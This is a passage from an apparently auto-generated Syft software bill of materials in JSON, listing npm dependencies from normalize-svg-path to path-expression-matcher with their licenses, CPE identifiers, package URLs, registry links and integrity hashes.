2ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==","dependencies":null}},{"id":"2e420341fd4164af","name":"normalize-svg-path","version":"1.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:normalize-svg-path:normalize-svg-path:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize-svg-path:normalize_svg_path:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize_svg_path:normalize-svg-path:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize_svg_path:normalize_svg_path:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize-svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize-svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize_svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize_svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize:normalize-svg-path:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize:normalize_svg_path:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/normalize-svg-path@1.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/normalize-svg-path/-/normalize-svg-path-1.1.0.tgz","integrity":"sha512-r9KHKG2UUeB5LoTouwDzBy2VxXlHsiM6fyLQvnJa0S5hrhzqElH/CH7TUGhT1fVvIYBIKf3OpY4YJ4CK+iaqHg==","dependencies":{"svg-arc-to-cubic-bezier":"^3.0.0"}}},{"id":"d7b65c8670c0c943","name":"object-assign","version":"4.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:object-assign:object-assign:4.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object-assign:object_assign:4.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object_assign:object-assign:4.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object_assign:object_assign:4.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object:object-assign:4.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object:object_assign:4.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/object-assign@4.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz","integrity":"sha512-rJgTQnkUnH1sFw8yT6VSU3zD3sWmu6sZhIseY8VX+GRu3P6F7Fu+JNDoXfklElbLJSnc3FUQHVe4cU5hj+BcUg==","dependencies":null}},{"id":"f0415e28bd0fa73d","name":"object-hash","version":"3.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:object-hash:object-hash:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object-hash:object_hash:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object_hash:object-hash:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object_hash:object_hash:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object:object-hash:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object:object_hash:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/object-hash@3.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz","integrity":"sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==","dependencies":null}},{"id":"67701f4036faa68d","name":"object-inspect","version":"1.13.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:object-inspect:object-inspect:1.13.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object-inspect:object_inspect:1.13.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object_inspect:object-inspect:1.13.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object_inspect:object_inspect:1.13.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object:object-inspect:1.13.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:object:object_inspect:1.13.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/object-inspect@1.13.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/object-inspect/-/object-inspect-1.13.4.tgz","integrity":"sha512-W67iLl4J2EXEGTbfeHCffrjDfitvLANg0UlX3wFUUSTx92KXRFegMHUVgSqE+wvhAbi4WqjGg9czysTV2Epbew==","dependencies":null}},{"id":"3329ff372baa3c68","name":"on-finished","version":"2.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:on-finished:on-finished:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on-finished:on_finished:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on_finished:on-finished:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on_finished:on_finished:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on:on-finished:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on:on_finished:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/on-finished@2.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz","integrity":"sha512-ikqdkGAAyf/X/gPhXGvfgAytDZtDbr+bkNUJ0N9h5MI/dmdgCs3l6hoHrcUv41sRKew3jIwrp4qQDXiK99Utww==","dependencies":{"ee-first":"1.1.1"}}},{"id":"9c42ff2fa50e9c68","name":"on-finished","version":"2.4.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:on-finished:on-finished:2.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on-finished:on_finished:2.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on_finished:on-finished:2.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on_finished:on_finished:2.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on:on-finished:2.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on:on_finished:2.4.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/on-finished@2.4.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz","integrity":"sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==","dependencies":{"ee-first":"1.1.1"}}},{"id":"c535b114447926f1","name":"on-headers","version":"1.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:on-headers:on-headers:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on-headers:on_headers:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on_headers:on-headers:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on_headers:on_headers:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on:on-headers:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:on:on_headers:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/on-headers@1.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/on-headers/-/on-headers-1.1.0.tgz","integrity":"sha512-737ZY3yNnXy37FHkQxPzt4UZ2UWPWiCZWLvFZ4fu5cueciegX0zGPnrlY6bwRg4FdQOe9YU8MkmJwGhoMybl8A==","dependencies":null}},{"id":"3f85171a571bc28a","name":"once","version":"1.4.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:once:once:1.4.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/once@1.4.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/once/-/once-1.4.0.tgz","integrity":"sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==","dependencies":{"wrappy":"1"}}},{"id":"7b45ff9710a4aaac","name":"otplib","version":"12.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:otplib:otplib:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/otplib@12.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/otplib/-/otplib-12.0.1.tgz","integrity":"sha512-xDGvUOQjop7RDgxTQ+o4pOol0/3xSZzawTiPKRrHnQWAy0WjhNs/5HdIDJCrqC4MBynmjXgULc6YfioaxZeFgg==","dependencies":{"@otplib/core":"^12.0.1","@otplib/preset-default":"^12.0.1","@otplib/preset-v11":"^12.0.1"}}},{"id":"c6cc7a145d3e597c","name":"p-limit","version":"2.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:p-limit:p-limit:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p-limit:p_limit:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p_limit:p-limit:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p_limit:p_limit:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p:p-limit:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p:p_limit:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/p-limit@2.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz","integrity":"sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==","dependencies":{"p-try":"^2.0.0"}}},{"id":"bdf7b3073a60eac3","name":"p-limit","version":"3.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:p-limit:p-limit:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p-limit:p_limit:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p_limit:p-limit:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p_limit:p_limit:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p:p-limit:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p:p_limit:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/p-limit@3.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz","integrity":"sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==","dependencies":{"yocto-queue":"^0.1.0"}}},{"id":"ee16619fa3035ca6","name":"p-locate","version":"4.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:p-locate:p-locate:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p-locate:p_locate:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p_locate:p-locate:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p_locate:p_locate:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p:p-locate:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p:p_locate:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/p-locate@4.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz","integrity":"sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==","dependencies":{"p-limit":"^2.2.0"}}},{"id":"ee061a11e32e10c1","name":"p-try","version":"2.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:p-try:p-try:2.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p-try:p_try:2.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p_try:p-try:2.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p_try:p_try:2.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p:p-try:2.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:p:p_try:2.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/p-try@2.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz","integrity":"sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==","dependencies":null}},{"id":"d82606f27243dac6","name":"package-json-from-dist","version":"1.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BlueOak-1.0.0","spdxExpression":"BlueOak-1.0.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:package-json-from-dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:package-json-from-dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:package_json_from_dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:package_json_from_dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:package-json-from:package-json-from-dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:package-json-from:package_json_from_dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:package_json_from:package-json-from-dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:package_json_from:package_json_from_dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:package-json:package-json-from-dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:package-json:package_json_from_dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:package_json:package-json-from-dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:package_json:package_json_from_dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:package:package-json-from-dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:package:package_json_from_dist:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/package-json-from-dist@1.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz","integrity":"sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==","dependencies":null}},{"id":"7762d448aa187997","name":"pako","version":"0.2.9","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"(MIT AND Zlib)","spdxExpression":"(MIT AND Zlib)","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]},{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:pako:pako:0.2.9:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/pako@0.2.9","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/pako/-/pako-0.2.9.tgz","integrity":"sha512-NUcwaKxUxWrZLpDG+z/xZaCgQITkA/Dv4V/T6bw7VON6l1Xz/VnrBqrYjZQ12TamKHzITTfOEIYUj48y2KXImA==","dependencies":null}},{"id":"8811cee431746c6d","name":"pako","version":"1.0.11","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"(MIT AND Zlib)","spdxExpression":"(MIT AND Zlib)","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:pako:pako:1.0.11:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/pako@1.0.11","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/pako/-/pako-1.0.11.tgz","integrity":"sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw==","dependencies":null}},{"id":"7c5d21eaeee09ad2","name":"parse-svg-path","version":"0.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:parse-svg-path:parse-svg-path:0.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:parse-svg-path:parse_svg_path:0.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:parse_svg_path:parse-svg-path:0.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:parse_svg_path:parse_svg_path:0.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:parse-svg:parse-svg-path:0.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:parse-svg:parse_svg_path:0.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:parse_svg:parse-svg-path:0.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:parse_svg:parse_svg_path:0.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:parse:parse-svg-path:0.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:parse:parse_svg_path:0.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/parse-svg-path@0.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/parse-svg-path/-/parse-svg-path-0.1.2.tgz","integrity":"sha512-JyPSBnkTJ0AI8GGJLfMXvKq42cj5c006fnLz6fXy6zfoVjJizi8BNTpu8on8ziI1cKy9d9DGNuY17Ce7wuejpQ==","dependencies":null}},{"id":"22f6c66ddf9c06f1","name":"parseley","version":"0.12.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:parseley:parseley:0.12.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/parseley@0.12.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/parseley/-/parseley-0.12.1.tgz","integrity":"sha512-e6qHKe3a9HWr0oMRVDTRhKce+bRO8VGQR3NyVwcjwrbhMmFCX9KszEV35+rn4AdilFAq9VPxP/Fe1wC9Qjd2lw==","dependencies":{"leac":"^0.6.0","peberminta":"^0.9.0"}}},{"id":"484c0b9a6084b4bb","name":"parseurl","version":"1.3.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:parseurl:parseurl:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/parseurl@1.3.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz","integrity":"sha512-CiyeOxFT/JZyN5m0z9PfXw4SCBJ6Sygz1Dpl0wqjlhDEGGBP1GnsUVEL0p63hoG1fcj3fHynXi9NYO4nWOL+qQ==","dependencies":null}},{"id":"7c130f49f1f39739","name":"path-exists","version":"4.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:path-exists:path-exists:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path-exists:path_exists:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_exists:path-exists:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_exists:path_exists:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path:path-exists:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path:path_exists:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/path-exists@4.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz","integrity":"sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==","dependencies":null}},{"id":"802e4db060f878e6","name":"path-expression-matcher","version":"1.5.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:path-expression-matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path-expression-matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_expression_matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_expression_matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path-expression:path-expression-matcher:1.5.0